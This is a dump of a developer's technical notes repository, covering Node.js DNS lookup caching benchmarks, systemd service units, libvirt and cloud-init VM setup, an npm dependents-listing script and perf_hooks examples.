  family: 4,
  lookup: dnsCustomLookup
})
```

##### http

The documentation for [http.request](https://nodejs.org/api/http.html#http_http_request_url_options_callback) does not mention `lookup` redefinition directly, but behind the scenes [http.Agent](https://nodejs.org/api/http.html#http_class_http_agent) in [agent.createConnection](https://nodejs.org/api/http.html#http_agent_createconnection_options_callback) calls [net.createConnection](https://nodejs.org/api/net.html#net_net_createconnection_options_connectlistener), which calls `socket.connect`, so `dns.lookup()` can be redefined in the same way as for the `net` module.

```js
http.request({
  ...
  family: 4,
  lookup: dnsCustomLookup
})
```

It's also possible to save these options in an `http.Agent`:

```js
const agent = new http.Agent({ family: 4, lookup: dnsCustomLookup })
http.request({ agent })
```

or patch [http.globalAgent](https://nodejs.org/api/http.html#http_http_globalagent):

```js
http.globalAgent.options.family = 4
http.globalAgent.options.lookup = dnsCustomLookup
http.request({ ... })
```
-------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/coredns/Corefile: --------------------------------------------------------------------------------
. {
  errors
  file db.example.com example.com {
    reload 1s
  }
  forward . 8.8.8.8
  loop
  reload 2s
}
-------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/coredns/db.example.com: --------------------------------------------------------------------------------
example.com. IN SOA dns.example.com. dns.example.com. 1564497611 2h 30m 1d 30
a.example.com. IN A 127.0.0.1
b.example.com. IN CNAME a.example.com.
-------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/js/dns-lookup-cache.js: --------------------------------------------------------------------------------
const dns = require('dns')
const test = require('./test-fn')

const lookup = createLookupCache()
test(1e5, 100, (callback) => {
  lookup('a.example.com', { family: 4 }, (err) => {
    if (err) console.error(err)
    callback()
  })
})

function createLookupCache () {
  const cache = new Map()

  return function dnslookup (hostname, options, callback) {
    if (typeof options === 'function') {
      callback = options
      options = { family: 0 }
    }

    const key = `${hostname};${JSON.stringify(options)}`
    const cachedLookup = cache.get(key)
    if (cachedLookup !== undefined) {
      cachedLookup.callbacks.push(callback)
      return cachedLookup.reqWrap
    }

    const callbacks = [callback]
    const reqWrap = dns.lookup(hostname, options, (err, address, family) => {
      cache.delete(key)

      for (const callback of callbacks) {
        process.nextTick(callback, err, address, family)
      }
    })
    cache.set(key, { callbacks, reqWrap })

    return reqWrap
  }
}
-------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/js/dns-lookup-cache2.js: --------------------------------------------------------------------------------
const dns = require('dns')
const test = require('./test-fn')

const lookup = createLookupCache()
test(1e5, 100, (callback) => {
  lookup('a.example.com', { family: 4 }, (err) => {
    if (err) console.error(err)
    callback()
  })
})

function createLookupCache (ttl = 10) {
  const cache = new Map()
  let nextCleanUp = Date.now() + 2 * ttl

  return function dnslookup (hostname, options, callback) {
    if (typeof options === 'function') {
      callback = options
      options = { family: 0 }
    }

    const now = Date.now()
    if (nextCleanUp < now) {
      for (const [key, { validUpTo }] of cache.entries()) {
        if (validUpTo < now) cache.delete(key)
      }

      nextCleanUp = now + 2 * ttl
    }

    const key = `${hostname};${JSON.stringify(options)}`
    const cachedLookup = cache.get(key)
    if (cachedLookup !== undefined && !(cachedLookup.result !== null && cachedLookup.validUpTo < now)) {
      if (cachedLookup.result === null) cachedLookup.callbacks.push(callback)
      else process.nextTick(callback, ...cachedLookup.result)

      return cachedLookup.reqWrap
    }

    const callbacks = [callback]
    const reqWrap = dns.lookup(hostname, options, (err, address, family) => {
      for (const callback of callbacks) {
        process.nextTick(callback, err, address, family)
      }

      const obj = cache.get(key)
      obj.result = [err, address, family]
      obj.validUpTo = Date.now() + ttl
    })
    cache.set(key, { callbacks, reqWrap, result: null, validUpTo: null })

    return reqWrap
  }
}
-------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/js/dns-lookup.js: --------------------------------------------------------------------------------
const dns = require('dns')
const test = require('./test-fn')

test(1e5, 100, (callback) => {
  dns.lookup('a.example.com', { family: 4 }, (err) => {
    if (err) console.error(err)
    callback()
  })
})
-------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/js/dns-resolve-public-dns.js: --------------------------------------------------------------------------------
const dns = require('dns')
const test = require('./test-fn')

const resolver = new dns.Resolver()
resolver.setServers(['8.8.8.8'])

test(1e3, 100, (callback) => {
  resolver.resolve('google.com', 'A', (err) => {
    if (err) console.error(err)
    callback()
  })
})
-------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/js/dns-resolve.js: --------------------------------------------------------------------------------
const dns = require('dns')
const test = require('./test-fn')

test(1e5, 100, (callback) => {
  dns.resolve('a.example.com', 'A', (err) => {
    if (err) console.error(err)
    callback()
  })
})
-------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/js/test-fn.js: --------------------------------------------------------------------------------
module.exports = (count, parallel, fn) => {
  const labelTime = 'Elapsed time'

  const timerStart = () => console.time(labelTime)
  let timerStop = () => {
    console.timeEnd(labelTime)
    timerStop = () => {}
  }

  function makeCall () {
    count -= 1
    if (count >= 0) fn(makeCall)
    else timerStop()
  }

  timerStart()
  for (let i = 0; i < parallel; ++i) makeCall()
}
-------------------------------------------------------------------------------- /2019-08-23-systemd-instead-pm2/README.md: --------------------------------------------------------------------------------

# systemd instead of pm2?

A few years ago, when I needed to run my apps on servers, I found [pm2](http://pm2.keymetrics.io/). It is a really cool tool: everything you need is to install [Node.js](https://nodejs.org/) and then pm2 with [npm](https://www.npmjs.com/). It's handy to start / stop / restart programs, logs from stdout/stderr go to files, and pm2 has modules for log rotation. You can also define an [Ecosystem File](http://pm2.keymetrics.io/docs/usage/application-declaration/) that describes environment variables and other things. In the past, to deploy a new version I logged in to the server through SSH, fetched the new code to the local repo with SSH agent forwarding (I'm sorry about that, never repeat my mistake, agent forwarding is not safe!) and restarted the service. All fine, while your project is not big.
You also can define [Ecosystem File](http://pm2.keymetrics.io/docs/usage/application-declaration/) where describe environment variables and other things. In past for deployment new version I logged through SSH to server, fetched new code to local repo with SSH agent forwarding (I'm sorry about that, never repeat my mistake, agent forwardning is not safe!) and restarted service. All fine, while you project is not big. 4 | 5 | Now in containers era we run our services in containers which managed by different systems, from simple [docker-compose](https://docs.docker.com/compose/compose-file/) to omnipotent [Kubernetes](https://kubernetes.io/). Logs forwarded by programs like [Fluent Bit](https://fluentbit.io/) to [Elastic Stack](https://www.elastic.co/products/elastic-stack). Do we really pm2 now? I'm think not. 6 | 7 | But what if you need run some services which are not good for containers? Maybe services have big performance degradation or you do not want to deal with state in containers? Do we still need pm2 for this? I still think not, because much better use [systemd](https://www.freedesktop.org/wiki/Software/systemd/) for this. 8 | 9 | `systemd` is not simple, there a lot of docs, some helpful pages: 10 | 11 | - list of all `systemd` manpages — https://www.freedesktop.org/software/systemd/man/ 12 | - `journal`: 13 | - `journalctl`: https://www.freedesktop.org/software/systemd/man/journalctl.html 14 | - `journald.conf`: https://www.freedesktop.org/software/systemd/man/journald.conf.html 15 | - `systemd-journald.service`: https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html 16 | - `systemctl`: https://www.freedesktop.org/software/systemd/man/systemctl.html 17 | - `systemd`: https://www.freedesktop.org/software/systemd/man/systemd.html 18 | - `systemd.exec`: https://www.freedesktop.org/software/systemd/man/systemd.exec.html 19 | - `systemd.kill`: https://www.freedesktop.org/software/systemd/man/systemd.kill.html 20 | - `systemd.resource-usage`: https://www.freedesktop.org/software/systemd/man/systemd.resource-control.html 21 | - `systemd.unit`: https://www.freedesktop.org/software/systemd/man/systemd.unit.html 22 | - `systemd.service`: https://www.freedesktop.org/software/systemd/man/systemd.service.html 23 | 24 | Example of [Bitcoin Core](https://github.com/bitcoin/bitcoin/) service (see [bitcoind.service](https://github.com/bitcoin/bitcoin/blob/master/contrib/init/bitcoind.service)): 25 | 26 | `systemd` loading units from few directories, but if we create unit we should put it to `/etc/systemd/system/` ([systemd.unit](https://www.freedesktop.org/software/systemd/man/systemd.unit.html) see `Table 1`). 
```bash
cat > /etc/systemd/system/bitcoind.service <<EOF
[Unit]
Description=Bitcoin daemon
; conditions below require systemd >= 242
; ConditionMemory=>=512M
; ConditionCPUs=>=1

[Service]
Type=simple
ExecStart=/usr/local/bin/bitcoind \
  -datadir=/var/lib/bitcoind \
  -txindex \
  -disablewallet \
  -printtoconsole \
  -server \
  -rpcuser=bitcoinrpc \
  -rpcpassword=password \
  -rpcport=8332 \
  -zmqpubhashtx=tcp://127.0.0.1:28332 \
  -rest
User=ubuntu
Group=ubuntu
KillMode=process
KillSignal=SIGTERM
TimeoutStopSec=30s
Restart=on-failure
# /var/lib/bitcoind
StateDirectory=bitcoind
StateDirectoryMode=0710

[Install]
WantedBy=multi-user.target
EOF
```

Optionally we can control resource usage with [systemd.resource-control](https://www.freedesktop.org/software/systemd/man/systemd.resource-control.html) by adding options to `[Service]`:

```bash
[Service]
CPUAccounting=1
CPUQuota=100%
MemoryAccounting=1
MemoryMax=300M
MemorySwapMax=0
LimitRSS=300M
LimitAS=500M
```

Before we are able to use our service we need to reload the configuration:

```bash
systemctl daemon-reload
systemctl enable bitcoind.service --now
```

Logs can be read with `journalctl`:

```bash
journalctl -feu bitcoind
```
-------------------------------------------------------------------------------- /2019-08-30-node-uvthreads-sync-async/README.md: --------------------------------------------------------------------------------

# uvthreads sync vs async in Node.js

Yesterday, while I watched `A Journey into Node.js Internals` by `Tamar Twena-Stern`, I realized how good her example of profiling Node.js is for demonstrating the thread pool in [Node.js](https://nodejs.org/).

Record of the talk on YouTube (from 18:52): https://youtu.be/LbwUETu7Rgc?t=1132

While the speaker talks about profiling and blocking the event loop, I want to draw attention to parallelization. Code:

```js
const crypto = require('crypto')

;(async () => {
  const count = 1e2
  const async = () => new Promise((resolve) => crypto.pbkdf2('secret', 'salt', 1e5, 64, 'sha256', () => resolve()))
  const sync = () => crypto.pbkdf2Sync('secret', 'salt', 1e5, 64, 'sha256')

  console.time('async')
  await Promise.all(new Array(count).fill(null).map(() => async()))
  console.timeEnd('async')

  console.time('sync')
  for (let i = 0; i < count; ++i) sync()
  console.timeEnd('sync')
})()
```

Maybe this will be a surprise for somebody, but the result (CPU `i5-8250U`):

```bash
$ node test.js
async: 2680.411ms
sync: 10029.770ms
```

Why is async 4x faster? Because the async version of `pbkdf2` works in libuv threads. By default we have 4 threads. My CPU has 4 cores (8 vCPUs), so each thread works on its own core and we get a speedup.

With a changed thread pool size:

```bash
$ UV_THREADPOOL_SIZE=2 node test.js
async: 4998.330ms
sync: 9904.204ms
$ UV_THREADPOOL_SIZE=6 node test.js
async: 2622.291ms
sync: 9898.255ms
```

Interestingly, increasing the number of threads to 6 did not improve the result compared to 4 threads. I guess this is because the hashing execution units exist per physical core, i.e. one per two vCPUs, so extra threads on hyper-threaded siblings do not add throughput.
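A quick way to check the core topology behind this guess on Linux (field names may vary between `lscpu` versions):

```bash
# logical CPUs vs physical cores (hyper-threading)
lscpu | grep -E '^(CPU\(s\)|Core\(s\) per socket|Thread\(s\) per core)'
```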
-------------------------------------------------------------------------------- /2019-08-31-libvirt-usage/README.md: --------------------------------------------------------------------------------

# Virtual Machines with libvirt

In the containers era it can seem strange to use Virtual Machines for running or testing something, but sometimes we need a fully isolated environment, because this way we can reproduce parts of production systems locally. Also, some software is much easier to test and debug in Virtual Machines.

- [libvirt](#libvirt)
- [setup](#setup)
  - [Tools](#tools)
  - [URI](#uri)
  - [Image](#image)
  - [ISO image for cloud-init](#iso-image-for-cloud-init)
  - [Creating VM](#creating-vm)
  - [Static IP](#static-ip)
  - [Destroy](#destroy)

### libvirt

[libvirt](https://libvirt.org/) is great because it provides a universal API which can work with different technologies. Usually KVM/QEMU is used.

`libvirtd` can be managed in different ways (see https://libvirt.org/apps.html). You can do a lot with the GUI app [virt-manager](https://virt-manager.org/), and this is probably a good choice if you need 1-2 machines without recreating them. Otherwise we need to automate the creation/updating/removal/etc. of our VMs.

Nowadays a lot of Linux distros provide cloud images (for example [fedora](https://alt.fedoraproject.org/cloud/), [ubuntu](https://cloud-images.ubuntu.com/)). This is the preferred way because you get a working OS out of the box with [cloud-init](https://cloud-init.io/) services installed (for initial setup, like adding SSH keys).

### Setup

##### Tools

Before we continue you should install `libvirt` itself and the `virt-install` and `genisoimage` tools. Tools like `virsh` and `qemu-*` will be installed with `libvirt`. The problem with `virsh` (and why we need `virt-install`) is that `virsh` works only with XML documents. It's not very comfortable to work with XML for creating Virtual Machines, so we will use `virt-install`. You also need to add yourself to the `libvirt` group:

```bash
usermod -a -G libvirt $(whoami)
```

##### URI

Since `libvirt` supports different kinds of virtualization, we need to say which one exactly we want to use. `virsh` uses the environment variable `LIBVIRT_DEFAULT_URI`; if this variable is not defined, `qemu:///session` will be used for non-root users and `qemu:///system` for the root user, so for using system mode we should define `LIBVIRT_DEFAULT_URI` (otherwise the VM will have local user permissions). See [libvirt uri](https://libvirt.org/uri.html), [what is the difference between](https://wiki.libvirt.org/page/FAQ#What_is_the_difference_between_qemu:.2F.2F.2Fsystem_and_qemu:.2F.2F.2Fsession.3F_Which_one_should_I_use.3F), [explanation on KVM/QEMU page](https://libvirt.org/drvqemu.html#securitydac).

```bash
echo "export LIBVIRT_DEFAULT_URI=qemu:///system" >> ~/.bashrc
export LIBVIRT_DEFAULT_URI=qemu:///system
```

##### Image

We will run Ubuntu 18.04 in our VM; let's download the base image:

```bash
mkdir /var/lib/libvirt/images/base
curl -o /var/lib/libvirt/images/base/ubuntu18.04.qcow2 https://cloud-images.ubuntu.com/bionic/current/bionic-server-cloudimg-amd64.img
```

I created a `base` directory in `/var/lib/libvirt/images`, but this is not necessary, you can use any directory available to you (`/var/lib/libvirt` requires root access).
Now we will create an image for our VM and resize it to 5G:

```bash
qemu-img create -f qcow2 -b /var/lib/libvirt/images/base/ubuntu18.04.qcow2 /var/lib/libvirt/images/test1.qcow2
qemu-img resize /var/lib/libvirt/images/test1.qcow2 5G
qemu-img info /var/lib/libvirt/images/test1.qcow2
```

```bash
image: /var/lib/libvirt/images/test1.qcow2
file format: qcow2
virtual size: 5.0G (5368709120 bytes)
disk size: 200K
cluster_size: 65536
backing file: /var/lib/libvirt/images/base/ubuntu18.04.qcow2
Format specific information:
    compat: 1.1
    lazy refcounts: false
    refcount bits: 16
    corrupt: false
```

When we create an image with a backing file we must not move/remove the backing file later; [qcow2](https://en.wikipedia.org/wiki/Qcow) works as a copy-on-write layered file system. If you check the size of the created image you will find that the file is less than 1MB.

We can also `convert` the base image, so that a backing file will not be required:

```bash
qemu-img convert -f qcow2 -O qcow2 -c bionic-server-cloudimg-amd64.img ubuntu18.04.qcow2
```

If we do not use the `-c` flag we get an uncompressed image: 1.1GB vs \~330MB.

We can also mount our image with the `qemu-nbd` tool:

```bash
qemu-nbd -c /dev/nbd0 /var/lib/libvirt/images/test1.qcow2
```

and then mount the device `/dev/nbd0p1` as usual with the `mount` command.

##### ISO image for cloud-init

For the initial setup of our VM we can use [cloud-init](https://cloud-init.io/), which is already preinstalled. We will need two files:

1) An empty `meta-data`. For available options see: https://cloudinit.readthedocs.io/en/latest/topics/datasources.html

2) `user-data` with a defined `hostname`, a list of SSH keys and a new `sshd` config:

```bash
#cloud-config
hostname: test1

disable_root: false
ssh_authorized_keys:
  - ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDrN2DVTlDzXklIDAkvet62Ve5uQPNpCCc0EG9JjGBzpWGy80r1KLgJgas5xLJYGZaygfuxY6Iij3mZ3QHVbCa3XITjojR8v53jUGXQ0Ouo/D3VaBdRqeno7iJu6GsWKfVo15duf49f4AB98pj7BqXcHxj8xyxLSb2keUwvi7ugJb3KDpEjdWprajN92Uj/uT4PpDM5xrSRb1QVwXJ0XWz8TKZKlhH0xD3UWjLEhQjOk6PO31Dcip+k9waxyJGlmLy/c7Z8KA5gOzGbpN3q1phV4OPzKj6RlkJj0YY1Lvqt8aV4QqLfKFatBGL0+5GyEkckWUsJkXbmcaVbMvXU0Oqb fanatid@ya.ru

write_files:
  - path: /etc/ssh/sshd_config
    owner: root:root
    permissions: '0600'
    content: |
      AcceptEnv LANG LC_*
      ChallengeResponseAuthentication no
      PasswordAuthentication no
      PrintMotd no
      Subsystem sftp /usr/lib/openssh/sftp-server
      UsePAM yes
      X11Forwarding yes

runcmd:
  - systemctl restart sshd.service
```

Main documentation page: https://cloudinit.readthedocs.io/en/latest/index.html Personally I found the [examples](https://cloudinit.readthedocs.io/en/latest/topics/examples.html) and [modules](https://cloudinit.readthedocs.io/en/latest/topics/modules.html) pages most useful.
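Before baking `user-data` into the ISO it can be validated; recent cloud-init releases ship a schema checker (the exact subcommand has moved between versions, so treat the invocation below as a hint, not a guaranteed interface):

```bash
# validate the #cloud-config file before creating the ISO
cloud-init devel schema --config-file user-data
```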
Creating the image:

```bash
genisoimage -output /var/lib/libvirt/images/test1-cidata.iso -input-charset utf8 -volid cidata -joliet -rock user-data meta-data
```

##### Creating VM

As I wrote above, we will use `virt-install` for creating the VM:

```bash
$ virt-install \
  --name test1 \
  --virt-type kvm \
  --os-type linux \
  --os-variant ubuntu18.04 \
  --memory 1024 \
  --vcpus=1 \
  --disk /var/lib/libvirt/images/test1.qcow2,format=qcow2 \
  --disk /var/lib/libvirt/images/test1-cidata.iso,device=cdrom \
  --network network=default \
  --graphics none \
  --import \
  --noautoconsole

Starting install...
Domain creation completed.
```

I do not think the arguments need comments, they are pretty obvious. After this command we need to get the Virtual Machine's IP address (libvirt uses [dnsmasq](http://www.thekelleys.org.uk/dnsmasq/doc.html) for DHCP, see [libvirtd and dnsmasq (wiki page)](https://wiki.libvirt.org/page/Libvirtd_and_dnsmasq)).

```bash
$ virsh list
 Id   Name    State
-----------------------
 19   test1   running
$ virsh domifaddr test1
 Name       MAC address          Protocol     Address
-------------------------------------------------------------------------------
 vnet0      52:54:00:3d:78:cf    ipv4         192.168.122.111/24
```

Our IP is `192.168.122.111` and we can connect with SSH:

```bash
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" root@192.168.122.111
```

Also, now we can eject our image with the `cloud-init` data:

```bash
virsh change-media --domain test1 sda --eject
```

##### Static IP

If we are trying to reproduce some system, dynamic IP addresses are not helpful, because configs often have hard-coded IPs of services, so we need static IP addresses for our VMs.

Unfortunately there is no very easy way to do it, but it is possible:

```bash
virt-install \
  --name test1 \
  --virt-type kvm \
  --os-type linux \
  --os-variant ubuntu18.04 \
  --memory 1024 \
  --vcpus=1 \
  --disk /var/lib/libvirt/images/test1.qcow2,format=qcow2 \
  --disk /var/lib/libvirt/images/test1-cidata.iso,device=cdrom \
  --network network=default \
  --graphics none \
  --import \
  --noautoconsole \
  --print-xml | virsh define /dev/stdin

virsh net-update default add ip-dhcp-host "<host mac='52:54:00:3d:78:cf' ip='192.168.122.10'/>" --live --config
virsh net-update default delete ip-dhcp-host "<host mac='52:54:00:3d:78:cf' ip='192.168.122.10'/>" --live --config
```

Instead of creating the VM with `virt-install` we only define it with `virsh` without starting it; next we set IP `192.168.122.10` for our VM by MAC address.
As a result you should see:

```bash
Updated network default persistent config and live state
```

Other `virsh net-update` commands: https://wiki.libvirt.org/page/Networking#virsh_net-update

##### Destroy

To remove our VM we need to:

1) Stop it with the `destroy` command: `virsh destroy test1`
2) Undefine it (remove info about it from `libvirtd`): `virsh undefine test1`
-------------------------------------------------------------------------------- /2019-09-01-npm-package-dependents/README.md: --------------------------------------------------------------------------------

# Package dependents from npmjs.com

Every time I visited a package page on [npm](https://www.npmjs.com/) I was curious which dependents add the most weight in downloads. Finally I decided to write a simple script which shows it.

The script has zero dependencies and is also a good demonstration of Node.js [Streams](https://nodejs.org/api/stream.html) and of a progress bar implemented on [TTY](https://nodejs.org/api/tty.html) (a simple version of [node-progress](https://github.com/visionmedia/node-progress)).

I did not find an API for fetching dependents, so I checked how npmjs.com works and fetch the data from the API used by the web-site. Luckily I found that npm provides an API for download statistics and, even better, requests can be batched up to 128 items. Unfortunately batches are still not supported for scoped packages.

The script is located in the current directory under the name [show-dependents.js](./show-dependents.js). Everything you need to do is execute it with the package name as the first argument. For example, for the package [hash-base](https://www.npmjs.com/package/hash-base):

```bash
./show-dependents.js hash-base
Processed 25 / 31 (80.65%), elapsed: 2.74s
┌─────────┬───────────────────────────────────┬──────────────┐
│ (index) │ package                           │ downloads    │
├─────────┼───────────────────────────────────┼──────────────┤
│ 0       │ 'ripemd160'                       │ '25,705,386' │
│ 1       │ 'md5.js'                          │ '25,215,484' │
│ 2       │ 'react-misc-toolbox'              │ '156'        │
│ 3       │ 'responsive-react-app'            │ '130'        │
│ 4       │ 'webche'                          │ '115'        │
│ 5       │ 'iris-embedded-sdk'               │ '96'         │
│ 6       │ 'react-input-select'              │ '57'         │
│ 7       │ 'viber-botkit'                    │ '25'         │
│ 8       │ 'carousel-react'                  │ '22'         │
│ 9       │ 'search-list-react'               │ '18'         │
│ 10      │ 'search-input-react'              │ '18'         │
│ 11      │ 'canvas-fingerprint'              │ '17'         │
│ 12      │ 'a_react_reflux_demo'             │ '15'         │
│ 13      │ '@ngxvoice/ngx-voicelistner'      │ '13'         │
│ 14      │ '@southcn/ckeditor5-build-inline' │ '12'         │
│ 15      │ 'digital-keyboard-demos'          │ '12'         │
│ 16      │ 'fhir2'                           │ '10'         │
│ 17      │ 'iris-node-js-sdk'                │ '10'         │
│ 18      │ 'react-redux-demo1'               │ '10'         │
│ 19      │ 'miguelcostero-ng2-toasty'        │ '10'         │
│ 20      │ 'freemamba'                       │ '8'          │
│ 21      │ 'outils-ren'                      │ '8'          │
│ 22      │ '@ericmcornelius/ease'            │ '6'          │
│ 23      │ 'lrbceshi'                        │ '6'          │
│ 24      │ 'vue-compment'                    │ '5'          │
└─────────┴───────────────────────────────────┴──────────────┘
```

As you probably noticed, the number of indexed packages differs from the total number... I'm not sure why npmjs.com shows a total bigger than the number of dependents; probably because private packages exist?
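The bulk endpoint the script relies on is the public download-counts API (documented at https://github.com/npm/registry/blob/master/docs/download-counts.md); you can try it directly:

```bash
# up to 128 comma-separated packages per request (bulk queries do not support scoped packages)
curl https://api.npmjs.org/downloads/point/last-month/ripemd160,md5.js
```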
46 | -------------------------------------------------------------------------------- /2019-09-01-npm-package-dependents/show-dependents.js: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env node 2 | const https = require('https') 3 | const { EOL } = require('os') 4 | const stream = require('stream') 5 | 6 | async function makeRequest (url, headers = {}) { 7 | return new Promise((resolve, reject) => { 8 | const req = https.request(url, { headers }) 9 | req.on('error', reject) 10 | req.on('timeout', () => { 11 | req.abort() 12 | reject(new Error('Timeout error')) 13 | }) 14 | req.on('response', (resp) => { 15 | if (resp.statusCode !== 200) { 16 | return reject(new Error(resp.statusMessage)) 17 | } 18 | 19 | const chunks = [] 20 | resp.on('data', (chunk) => chunks.push(chunk)) 21 | resp.on('end', () => resolve(Buffer.concat(chunks).toString('utf8'))) 22 | }) 23 | 24 | req.end() 25 | }) 26 | } 27 | 28 | async function makeRequestJSON (...args) { 29 | return JSON.parse(await makeRequest(...args)) 30 | } 31 | 32 | async function getTotal (pkg) { 33 | const html = await makeRequest(`https://www.npmjs.com/package/${pkg}`) 34 | const match = html.match(/href="\?activeTab=dependents">.*?>([0-9,]+)/) || ['', ''] 35 | 36 | const value = parseInt(match[1].replace(/,/, ''), 10) 37 | if (Number.isInteger(value)) return value 38 | 39 | throw new Error(`Invalid number of dependents: ${match}`) 40 | } 41 | 42 | function delay (ms) { 43 | return new Promise((resolve) => setTimeout(resolve, ms)) 44 | } 45 | 46 | class FetchDepsStream extends stream.Readable { 47 | constructor (pkg, total) { 48 | super({ objectMode: true }) 49 | 50 | this.pkg = pkg 51 | this.offset = 0 52 | this.step = 36 53 | this.total = total 54 | 55 | this.lastFetch = 0 56 | this.delayBetweenRequests = 1000 57 | } 58 | 59 | async _read () { 60 | if (this.offset >= this.total) { 61 | this.push(null) 62 | return 63 | } 64 | 65 | const sleep = this.lastFetch + this.delayBetweenRequests - Date.now() 66 | if (sleep > 0) await delay(sleep) 67 | 68 | const XHRHeaders = { 'x-requested-with': 'XMLHttpRequest', 'x-spiferack': 1 } 69 | const { packages } = await makeRequestJSON(`https://www.npmjs.com/browse/depended/${this.pkg}?offset=${this.offset}`, XHRHeaders) 70 | for (const pkg of packages) this.push(pkg.name) 71 | 72 | this.lastFetch = Date.now() 73 | this.offset += this.step 74 | 75 | if (packages.length < 36) this.push(null) 76 | } 77 | } 78 | 79 | class FetchStatsTransform extends stream.Transform { 80 | constructor (pkg, bar) { 81 | super({ objectMode: true }) 82 | 83 | this.pkg = pkg 84 | this.bar = bar 85 | 86 | this.queue = [] 87 | this.pkgsPerRequest = 128 88 | 89 | this.stats = [] 90 | 91 | this.lastFetch = 0 92 | this.delayBetweenRequests = 250 93 | } 94 | 95 | async fetch (pkg) { 96 | const sleep = this.lastFetch + this.delayBetweenRequests - Date.now() 97 | if (sleep > 0) await delay(sleep) 98 | 99 | const pkgs = pkg ? 
[pkg] : this.queue.splice(0, this.pkgsPerRequest)

    // https://github.com/npm/registry/blob/master/docs/download-counts.md
    let stats = await makeRequestJSON(`https://api.npmjs.org/downloads/point/last-month/${pkgs.join(',')}`)
    if (pkg) stats = { [stats.package]: { downloads: stats.downloads } }

    for (const [pkg, { downloads }] of Object.entries(stats)) this.stats.push({ package: pkg, downloads })
    this.bar.tick(pkgs.length)

    this.lastFetch = Date.now()
  }

  async _flush (callback) {
    while (this.queue.length > 0) await this.fetch()

    this.stats.sort((a, b) => b.downloads - a.downloads)

    const nfmt = new Intl.NumberFormat('en')
    for (const item of this.stats) item.downloads = nfmt.format(item.downloads)

    callback(null, this.stats)
  }

  async _transform (pkg, encoding, callback) {
    const isScoped = pkg.startsWith('@')
    if (isScoped) {
      await this.fetch(pkg)
    } else {
      this.queue.push(pkg)
      if (this.queue.length >= this.pkgsPerRequest) await this.fetch()
    }

    callback(null)
  }
}

async function fetch (pkg, total, bar) {
  return new Promise((resolve, reject) => {
    const deps = new FetchDepsStream(pkg, total)
    const stats = new FetchStatsTransform(pkg, bar)

    stats.on('error', reject)
    stats.on('data', resolve)
    stats.on('end', () => reject(new Error('stream end without data, it\'s wrong')))

    deps.pipe(stats)
  })
}

function createProgressBar (total) {
  const stream = process.stdout
  if (!stream.isTTY) {
    return {
      tick () {},
      stop () {}
    }
  }

  let curr = 0

  const ts = process.hrtime()
  function draw () {
    const diffTS = process.hrtime(ts)
    stream.cursorTo(0)
    stream.write(`Processed ${curr} / ${total} (${(curr * 100 / total).toFixed(2)}%), elapsed: ${(diffTS[0] + diffTS[1] / 1e9).toFixed(2)}s`)
    stream.clearLine(1)
  }
  const drawId = setInterval(draw, ~~(1000 / 62)).unref() // 62 fps

  return {
    tick (len) {
      curr = Math.min(curr + len, total)
      draw()
    },

    stop () {
      clearInterval(drawId)
      stream.write(EOL)
    }
  }
}

;(async () => {
  const pkg = process.argv[2]
  const total = await getTotal(pkg)

  const bar = createProgressBar(total)
  const data = await fetch(pkg, total, bar)
  bar.stop()

  console.table(data, ['package', 'downloads'])
})().catch((err) => {
  console.error(err.stack || err)
  process.exit(1)
})
-------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/README.md: --------------------------------------------------------------------------------

# perf_hooks in Node.js

The `Performance Timing API` — [perf_hooks](https://nodejs.org/api/perf_hooks.html) (docs for [v12.10.0](https://nodejs.org/docs/v12.10.0/api/perf_hooks.html)) — was added to Node.js almost two years ago ([github.com/nodejs/node/pull/14680](https://github.com/nodejs/node/pull/14680)), but I had never checked what this module provides. When I looked through the docs I did not find detailed examples and wanted to dive deeper into the Garbage Collector, so this note is a set of examples for each `entryType` in `perf_hooks`.
The module is still `Experimental` (see [Stability Index](https://nodejs.org/api/documentation.html#documentation_stability_index)), so everything here is valid for [v12.10.0](https://github.com/nodejs/node/tree/v12.10.0); links will point to the code for this version.

- [node](#node)
- [mark & measure](#mark--measure)
- [function](#function)
- [http](#http)
- [http2](#http2)
- [gc](#gc)

#### node

The `PerformanceEntry` with type `node` is a special entry: you cannot receive it through an observer, because it is already defined and available as a property through a `getter`. This entry is a singleton class.

From this entry we can get the duration in milliseconds that was required to finish an action (i.e. a `milestone`). Currently we have access to 6 milestones. They are perfectly described in the [docs](https://nodejs.org/docs/v12.10.0/api/perf_hooks.html#perf_hooks_class_performancenodetiming_extends_performanceentry) ([code](https://github.com/nodejs/node/blob/v12.10.0/lib/perf_hooks.js#L154)).

```js
{
  name: 'node',
  entryType: 'node',
  startTime: 0,
  duration: 53.86693799495697,
  nodeStart: 0.279431015253067,
  v8Start: 2.476245015859604,
  bootstrapComplete: 43.5908420085907,
  environment: 11.12601301074028,
  loopStart: 49.44547098875046,
  loopExit: 49.459022015333176,
  thirdPartyMainStart: undefined,
  thirdPartyMainEnd: undefined,
  clusterSetupStart: undefined,
  clusterSetupEnd: undefined,
  moduleLoadStart: undefined,
  moduleLoadEnd: undefined,
  preloadModuleLoadStart: undefined,
  preloadModuleLoadEnd: undefined
}
```

Full code available in [examples/node.js](./examples/node.js)

In version 12.10.0 we can see other fields, but the milestones for these keys were removed in [github.com/nodejs/node/pull/21247](https://github.com/nodejs/node/pull/21247); the keys are still in the inspect function. I created a PR for removing them, so this will probably be fixed soon ([github.com/nodejs/node/pull/29528](https://github.com/nodejs/node/pull/29528)).

#### mark & measure

`mark` and `measure` are among the simplest entry types in `perf_hooks`. The idea is simple: we create a mark on the timeline for some name, create another mark and then measure the difference between them. For example, we create mark `A`, run some function, create mark `B`, then measure the time between the two marks; we can see both the `mark` and `measure` entries in the [PerformanceObserver](https://nodejs.org/docs/v12.10.0/api/perf_hooks.html#perf_hooks_class_performanceobserver) callback:

```js
{"name":"A","entryType":"mark","startTime":45.925918,"duration":0}
{"name":"B","entryType":"mark","startTime":116.494052,"duration":0}
{"name":"A to B","entryType":"measure","startTime":45.925918,"duration":70.568134}
```

